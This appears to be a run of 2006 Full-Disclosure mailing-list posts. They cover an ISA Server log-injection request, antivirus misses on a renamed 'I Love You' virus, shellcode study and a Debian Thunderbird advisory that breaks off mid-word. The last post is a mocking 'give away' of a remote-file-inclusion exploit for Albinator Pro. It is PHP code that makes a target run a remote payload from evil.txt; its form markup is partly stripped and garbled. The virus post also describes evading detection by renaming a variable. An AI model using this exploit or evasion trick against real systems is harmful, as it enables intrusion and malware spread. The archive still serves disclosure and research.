Discovered by: Noam Rathaus using the beSTORM fuzzer. Reported to vendor: December, 2005. Vendor response: Microsoft does not consider this issue to be a security vulnerability. Public release date: 4th of May, 2006. Advisory URL: http://www.beyondsecurity.com/besirt/advisories/042006-001-ISA-LM.txt Introduction There is a Log Manipulation vulnerability in Microsoft ISA Server 2004, which when exploited will enable a malicious user to manipulate the Destination Host parameter of the log file. Technical Details - By sending the following request to the server: GET / HTTP/1.0 Host: %01%02%03%04 Transfer-Encoding: whatever We were able to insert arbitrary characters, in this case the ASCII characters 1, 2, 3 (respectively) into the Destination Host parameter of the log file. This has been found after 3 days of running the beSTORM fuzzer at 600+ Sessions per Second while monitoring the ISA Server log file for problems. About ISA Server 2004 - "Microsoft Internet Security and Acceleration (ISA) Server 2004 is the advanced stateful packet and application-layer inspection firewall, virtual private network (VPN), and Web cache solution that enables enterprise customers to easily maximize existing information technology (IT) investments by improving network security and performance." Product URL: http://www.microsoft.com/isaserver/default.mspx -- beSIRT - Beyond Security's Incident Response Team [EMAIL PROTECTED] www.BeyondSecurity.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Panda Antivirus Enterprise Secure, Norton Antivirus 2005 and the virus "I Love You"
Hi to all! Trying with a friend the latest Panda Antivirus we have been found that is unable to detect the old "I Love You" virus by simply changing the name of one variable. Attached goes a working "I Love You" virus in which I changed ONLY the variable "dirsystem" with the name "kk2" (The file attached have the extension ".txt.gz", otherwise, with the .vbs extension the file will be locked by all the most populars anti-viral toolkits). If you sends it to an e-mail server that uses the Panda True-Prevent this will not found any virus. It will be "quarantined" if you send with the extension ".vbs", obviously, but will not detect it as a virus. Panda Antivirus Client-Shield will not found nothing. It's supposed that Panda TruePrevent and ClamAV should detect the strings that found in the contents of the file and should detect it as a virus. I found, also, that Norton Antivirus 2005 is unable to detect it. You can download any old virus that you want, rename one variable and you will have a "0 day virus". Wow! That's fun! NOTE: ClamAV (ClamAV 0.88.2/1439) detect's it. Disclaimer: ~~~ The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. --- Contact: Joxean Koret at joxeanpiti@yah00
Re: [Full-disclosure] shellcode study
erm what do you mean with "new" documents ? The old ones that cover shellcode, won't be any different to a "new" document. Its the same technics there unless you want polymorphic shellcode. Just look at the phrack magazine, there you will find papers regarding shellcode. -sk Http://www.groundzero-security.com - Original Message - From: azrael goblin To: full-disclosure@lists.grok.org.uk Sent: Thursday, May 04, 2006 11:47 AM Subject: [Full-disclosure] shellcode study hi guys , I am learning to write shellcode now. can somebody supply some new shellcode documents ? btw,if someone need some ,i can supply some old documents.sorry for my poor eng. thx your, goblin ___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] shellcode study
hi guys , I am learning to write shellcode now. can somebody supply some new shellcode documents ? btw,if someone need some ,i can supply some old documents.sorry for my poor eng. thx your, goblin ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] (no subject)
___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1051-1] New Mozilla Thunderbird packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1051-1[EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze May 4th, 2006 http://www.debian.org/security/faq - -- Package: mozilla-thunderbird Vulnerability : several Problem type : remote Debian-specific: no CVE IDs: CVE-2005-2353 CVE-2005-4134 CVE-2006-0292 CVE-2006-0293 CVE-2006-0296 CVE-2006-0748 CVE-2006-0749 CVE-2006-0884 CVE-2006-1045 CVE-2006-1529 CVE-2006-1530 CVE-2006-1531 CVE-2006-1723 CVE-2006-1724 CVE-2006-1727 CVE-2006-1728 CVE-2006-1729 CVE-2006-1730 CVE-2006-1731 CVE-2006-1733 CVE-2006-1734 CVE-2006-1735 CVE-2006-1736 CVE-2006-1737 CVE-2006-1738 CVE-2006-1739 CVE-2006-1740 CVE-2006-1741 CVE-2006-1742 CVE-2006-1790 CERT advisories: VU#179014 VU#252324 VU#329500 VU#350262 VU#488774 VU#492382 VU#592425 VU#736934 VU#813230 VU#842094 VU#932734 VU#935556 BugTraq IDs: 15773 16476 16476 16770 16881 17516 Several security related problems have been discovered in Mozilla Thunderbird. The Common Vulnerabilities and Exposures project identifies the following vulnerabilities: CVE-2005-2353 The "run-mozilla.sh" script allows local users to create or overwrite arbitrary files when debugging is enabled via a symlink attack on temporary files. CVE-2005-4134 Web pages with extremely long titles cause subsequent launches of the browser to appear to "hang" for up to a few minutes, or even crash if the computer has insufficient memory. [MFSA-2006-03] CVE-2006-0292 The Javascript interpreter does not properly dereference objects, which allows remote attackers to cause a denial of service or execute arbitrary code. [MFSA-2006-01] CVE-2006-0293 The function allocation code allows attackers to cause a denial of service and possibly execute arbitrary code. [MFSA-2006-01] CVE-2006-0296 XULDocument.persist() did not validate the attribute name, allowing an attacker to inject arbitrary XML and JavaScript code into localstore.rdf that would be read and acted upon during startup. [MFSA-2006-05] CVE-2006-0748 An anonymous researcher for TippingPoint and the Zero Day Initiative reported that an invalid and nonsensical ordering of table-related tags can be exploited to execute arbitrary code. [MFSA-2006-27] CVE-2006-0749 A particular sequence of HTML tags can cause memory corruption that can be exploited to exectute arbitary code. [MFSA-2006-18] CVE-2006-0884 Georgi Guninski reports that forwarding mail in-line while using the default HTML "rich mail" editor will execute JavaScript embedded in the e-mail message with full privileges of the client. [MFSA-2006-21] CVE-2006-1045 The HTML rendering engine does not properly block external images from inline HTML attachments when "Block loading of remote images in mail messages" is enabled, which could allow remote attackers to obtain sensitive information. [MFSA-2006-26] CVE-2006-1529 A vulnerability potentially allows remote attackers to cause a denial of service and possibly execute arbitrary. [MFSA-2006-20] CVE-2006-1530 A vulnerability potentially allows remote attackers to cause a denial of service and possibly execute arbitrary. [MFSA-2006-20] CVE-2006-1531 A vulnerability potentially allows remote attackers to cause a denial of service and possibly execute arbitrary. [MFSA-2006-20] CVE-2006-1723 A vulnerability potentially allows remote attackers to cause a denial of service and possibly execute arbitrary. [MFSA-2006-20] CVE-2006-1724 A vulnerability potentially allows remote attackers to cause a denial of service and possibly execute arbitrary. [MFSA-2006-20] CVE-2006-1727 Georgi Guninski reported two variants of using scripts in an XBL control to gain chrome privileges when the page is viewed under "Print Preview".under "Print Preview". [MFSA-2006-25] CVE-2006-1728 "shutdown" discovered that the crypto.generateCRMFRequest method can be used to run arbitrary code with the privilege of the user running the browser, which could enable an attacker to install malware. [MFSA-2006-24] CVE-2006-1729 Claus Jørgensen reported that a text input box can be pre-filled with a filename and then turned into a file-upload control, allowing a malicious website to steal any local file whose name they can guess. [MFSA-2006-23] CVE-2006-1730 An anonymous researcher for TippingPoint and the Zero Day Initiative discovered an integer overflow triggered by the CSS letter-spa
[Full-disclosure] [XPA] - Albinator Pro <= 2.0.8 - Remote Command Execution Vulnerability
===
XOR Crew :: Security Advisory 0day GIVE AWAY (date?) 2/20/2006
===
Albinator Pro <= 2.0.8 - Remote Command Execution Vulnerability
===
http://www.xorcrew.net/ http://www.xorcrew.net/ReZEN
===
:: Summary
Vendor : Albinator
Vendor Site : http://www.dreamcost.com/
Product(s) : Albinator Pro - Photo Album/Gallery Management System
Version(s) : All
Severity : Medium/High
Impact : Remote Command Execution
Release Date : 2/11/2006
Credits : ReZEN (rezen (a) xorcrew (.) net)
===
I. Description
Albinator is developed in PHP, backed by lightning speed database in
MySql. With its unique features, it instantly and automatically
organizes your websites' users digital images into compact digital photo
albums ideal for sharing and emailing to friends and family. It
automatically generates thumbnails to the photos for easy browsing.
===
II. Synopsis (0day give away because r0t is stupid)
THIS BUG WORKS FOR ALL VERSIONS OF ALBINATOR!!!
(r0t you are a moron, stick to useless XSS exploits please thanks)
There is a remote file inclusion vulnerability that allows for remote
command execution in the /essentials/gc.php and in the
essentials/integration.inc.php file. The bug is here on lines 2, and 3:
include_once($dirpath . "essential/config.php");
include_once($dirpath . "essential/config_tables.inc.php");
the $dirpath variable is not set prior to being used in the
include_once() function. The vendor and support team have been contacted.
===
Exploit code:
-BEGIN-
http://www.xorcrew.net/ReZEN
example:
turl: http://www.target.com/path to albinator/essential/gc.php?dirpath=
hurl: http://www.pwn3d.com/evil.txt?
*/
$cmd = $_POST["cmd"];
$turl = $_POST["turl"];
$hurl = $_POST["hurl"];
$form= ""
."turl:value=\"".$turl."\">"
."hurl:value=\"".$hurl."\">"
."cmd:value=\"".$cmd."\">"
.""
."";
if (!isset($_POST['submit']))
{
echo $form;
}else{
$file = fopen ("test.txt", "w+");
fwrite($file, "");
fclose($file);
$file = fopen ($turl.$hurl, "r");
if (!$file) {
echo "Unable to get output.\n";
exit;
}
echo $form;
while (!feof ($file)) {
$line .= fgets ($file, 1024)."";
}
$tpos1 = strpos($line, "++BEGIN++");
$tpos2 = strpos($line, "++END++");
$tpos1 = $tpos1+strlen("++BEGIN++");
$tpos2 = $tpos2-$tpos1;
$output = substr($line, $tpos1, $tpos2);
echo $output;
}
?>
--END--
===
IV. Greets :>
All of xor, Infinity, stokhli, ajax, gml, cijfer, D2K.
===
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
